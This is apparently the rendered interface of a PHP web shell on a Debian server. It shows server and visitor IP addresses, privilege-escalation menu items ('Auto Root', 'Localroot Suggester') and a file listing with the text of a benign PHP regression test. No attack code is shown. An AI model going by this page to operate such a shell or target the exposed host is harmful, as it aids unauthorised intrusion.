Linux vps-61133.fhnet.fr 4.9.0-19-amd64 #1 SMP Debian 4.9.320-2 (2022-06-30) x86_64
Apache/2.4.25 (Debian)
Server IP : 93.113.207.21 & Your IP : 216.73.216.112
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
src /
php-7.4.33 /
ext /
sysvshm /
tests /
Delete
Unzip
Name
Size
Permission
Date
Action
001.phpt
940
B
-rw-rw-r--
2022-10-31 11:36
002.phpt
1.75
KB
-rw-rw-r--
2022-10-31 11:36
003.phpt
1.22
KB
-rw-rw-r--
2022-10-31 11:36
004.phpt
986
B
-rw-rw-r--
2022-10-31 11:36
005.phpt
1.43
KB
-rw-rw-r--
2022-10-31 11:36
006.phpt
1.14
KB
-rw-rw-r--
2022-10-31 11:36
007.phpt
933
B
-rw-rw-r--
2022-10-31 11:36
bug72858.phpt
424
B
-rw-rw-r--
2022-10-31 11:36
shutdown_crash_0.phpt
409
B
-rw-rw-r--
2022-10-31 11:36
Save
Rename
--TEST-- Bug #72858 shm_attach null dereference --SKIPIF-- <?php if (!extension_loaded("sysvshm")){ print 'skip'; } if (4 < PHP_INT_SIZE) { print "skip 32-bit only"; } if (substr(PHP_OS, 0, 3) != "WIN") { print "skip windows only"; } ?> --FILE-- <?php $v1=100; $v2=0xffffffff / 4 + 0x1337; shm_attach($v1,$v2); ?> ==DONE== --EXPECTF-- Warning: shm_attach(): failed for key 0x64: Not enough space in %s on line %d ==DONE==